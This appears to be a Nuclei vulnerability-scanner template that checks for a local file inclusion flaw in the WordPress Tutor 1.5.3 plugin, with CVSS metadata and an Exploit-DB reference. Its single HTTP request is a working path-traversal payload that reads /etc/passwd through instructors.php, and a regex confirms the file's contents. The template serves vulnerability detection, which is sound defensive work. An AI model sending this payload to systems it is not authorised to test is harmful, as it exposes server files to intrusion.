id: wp-tutor-lfi

info:
  name: WordPress tutor 1.5.3 - Local File Inclusion
  author: 0x240x23elu
  severity: high
  description: WordPress tutor.1.5.3 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48058
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# digest: 4b0a00483046022100ee750ff662434ad9929bd03c0acb51c75bdb6e881339cd071be2755a9025f224022100d3f6bb6952220d95e61f50ce952522e5952559891602019a65e282cf240f0e1b:922c64590222798bb761d5b6d8e72950
